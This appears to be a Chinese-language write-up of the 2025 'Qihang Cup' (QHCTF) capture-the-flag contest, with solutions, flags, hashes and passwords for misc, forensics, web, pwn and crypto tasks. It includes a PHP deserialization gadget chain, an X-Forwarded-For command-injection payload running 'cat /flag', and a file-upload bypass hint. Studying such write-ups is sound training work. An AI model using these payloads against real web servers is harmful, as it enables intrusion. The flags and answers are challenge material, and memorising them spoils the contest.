第一届“启航杯”网络安全挑战赛WP
字数 1829 2025-08-22 12:23:24

第一届"启航杯"网络安全挑战赛Writeup解析

目录

  1. MISC题目解析
  2. Forensics题目解析
  3. Web题目解析
  4. Pwn题目解析
  5. Crypto题目解析

MISC题目解析

PvzHE题目

  • 题目内容:在指定文件夹中有一张图片
  • 解题步骤
    1. 找到图片文件
    2. 分析图片可能包含的隐写信息
    3. 使用工具如Stegsolve、binwalk等检查图片
  • flagQHCTF{300cef31-68d9-4b72-b49d-a7802da481a5}

拍摄地定位题目

  • 提示
    • "QHCTF For Year 2025"
    • "攻防世界有一样的 对应Q 以此类推 QHCTF{FUN}"
    • 需要找出拍摄地所在位置
  • 解题思路
    1. 分析"QHCTF{FUN}"可能是某种编码或替换密码
    2. 将"FUN"对应到字母表中的位置(F=6,U=21,N=14)
    3. 可能对应经纬度坐标
  • 答案:柳城、丰顺

Forensics题目解析

win01题目

  • 解题步骤
    1. 使用给定的软件分析文件
    2. 在云沙盒中进行分析
    3. 查找关键MD5值:ad4fdee2eada36ec3c20e9d6311cf258

win02题目

  • 关键信息
    • 用户名:HackY$
    • 密码哈希:32ED87BDB5FDC5E9CBA88547376818D4
    • 另一组凭证:HackY$_123456,哈希:fb484ad326c0f3a4970d1352bfbafef8

win07题目

  • 解题步骤
    1. 找到密码:Th3_1s_F1ag.Z1p_P@ssW0rd_Y0u_Now
    2. 使用该密码解压文件
  • flagQHCTF{6143b46a-8e98-4356-a9b2-251a7ec19e51}

Web题目解析

Web_pop题目

  • 漏洞类型:PHP反序列化漏洞
  • 解题步骤
    1. 分析后门位置:file_get_contents('/flag')
    2. 构造反序列化链:
    $a=new Start();
    $a->name=new Sec();
    $a->name->obj=new Easy();
    $a->name->obj->cla=new eeee();
    $a->name->obj->cla->obj=new Start();
    $a->name->obj->cla->obj->func=new Sec();
    
    1. 触发链式调用:
    • __invoke ($this->func)();
    • if(isset($this->obj->cmd))->($this->func)();->__invoke
    • $this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke
    • $this->obj->check($this->var);->$this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke
    • echo "Welcome to QHCTF 2025, ".$this->name;-> $this->obj->check($this->var);->$this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke

Web_IP题目

  • 漏洞类型:HTTP头注入
  • 利用方法
    • 在IP地址处可执行命令
    • 使用X-Forwarded-For头注入:X-Forwarded-For: {system('cat /flag')}

PCREMagic题目

  • 漏洞类型:文件上传漏洞
  • 关键点
    • 可以上传任意文件
    • 对文件名没有限制,最终会重命名为1-9.php
    • 关键检测点在文件内容:<?php pwn

Pwn题目解析

Easy_Pwn题目

  • 漏洞类型:栈溢出漏洞
  • 解题步骤
    1. 识别存在栈溢出漏洞的函数
    2. 构造ROP链或shellcode
    3. 编写exp利用漏洞

Crypto题目解析

Easy_RSA题目

  • 解题步骤
    1. 获取题目提供的公钥和私钥
    2. 访问靶机的/encode获取密文
    3. 使用RSA算法解密
  • flagQHCTF{ec9ee719-8336-4a7c-8c7f-745c89d220ce}

总结

本次比赛涵盖了网络安全竞赛的多个领域,包括:

  1. 杂项(MISC):考察隐写术和数据分析能力
  2. 取证(Forensics):考察文件分析和密码破解能力
  3. Web安全:考察反序列化漏洞、头注入和文件上传漏洞
  4. Pwn:考察二进制漏洞利用能力
  5. 密码学:考察RSA算法的理解和应用

每个题目都设计了特定的漏洞场景,需要选手具备全面的安全知识和实战能力才能解决。

第一届"启航杯"网络安全挑战赛Writeup解析 目录 MISC题目解析 Forensics题目解析 Web题目解析 Pwn题目解析 Crypto题目解析 MISC题目解析 PvzHE题目 题目内容 :在指定文件夹中有一张图片 解题步骤 : 找到图片文件 分析图片可能包含的隐写信息 使用工具如Stegsolve、binwalk等检查图片 flag : QHCTF{300cef31-68d9-4b72-b49d-a7802da481a5} 拍摄地定位题目 提示 : "QHCTF For Year 2025" "攻防世界有一样的 对应Q 以此类推 QHCTF{FUN}" 需要找出拍摄地所在位置 解题思路 : 分析"QHCTF{FUN}"可能是某种编码或替换密码 将"FUN"对应到字母表中的位置(F=6,U=21,N=14) 可能对应经纬度坐标 答案 :柳城、丰顺 Forensics题目解析 win01题目 解题步骤 : 使用给定的软件分析文件 在云沙盒中进行分析 查找关键MD5值: ad4fdee2eada36ec3c20e9d6311cf258 win02题目 关键信息 : 用户名: HackY$ 密码哈希: 32ED87BDB5FDC5E9CBA88547376818D4 另一组凭证: HackY$_123456 ,哈希: fb484ad326c0f3a4970d1352bfbafef8 win07题目 解题步骤 : 找到密码: Th3_1s_F1ag.Z1p_P@ssW0rd_Y0u_Now 使用该密码解压文件 flag : QHCTF{6143b46a-8e98-4356-a9b2-251a7ec19e51} Web题目解析 Web_ pop题目 漏洞类型 :PHP反序列化漏洞 解题步骤 : 分析后门位置: file_get_contents('/flag') 构造反序列化链: 触发链式调用: __invoke ($this->func)(); if(isset($this->obj->cmd))->($this->func)();->__invoke $this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke $this->obj->check($this->var);->$this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke echo "Welcome to QHCTF 2025, ".$this->name;-> $this->obj->check($this->var);->$this->cla = clone $var[0];-> if(isset($this->obj->cmd))->($this->func)();->__invoke Web_ IP题目 漏洞类型 :HTTP头注入 利用方法 : 在IP地址处可执行命令 使用 X-Forwarded-For 头注入: X-Forwarded-For: {system('cat /flag')} PCREMagic题目 漏洞类型 :文件上传漏洞 关键点 : 可以上传任意文件 对文件名没有限制,最终会重命名为1-9.php 关键检测点在文件内容: <?php pwn Pwn题目解析 Easy_ Pwn题目 漏洞类型 :栈溢出漏洞 解题步骤 : 识别存在栈溢出漏洞的函数 构造ROP链或shellcode 编写exp利用漏洞 Crypto题目解析 Easy_ RSA题目 解题步骤 : 获取题目提供的公钥和私钥 访问靶机的 /encode 获取密文 使用RSA算法解密 flag : QHCTF{ec9ee719-8336-4a7c-8c7f-745c89d220ce} 总结 本次比赛涵盖了网络安全竞赛的多个领域,包括: 杂项(MISC):考察隐写术和数据分析能力 取证(Forensics):考察文件分析和密码破解能力 Web安全:考察反序列化漏洞、头注入和文件上传漏洞 Pwn:考察二进制漏洞利用能力 密码学:考察RSA算法的理解和应用 每个题目都设计了特定的漏洞场景,需要选手具备全面的安全知识和实战能力才能解决。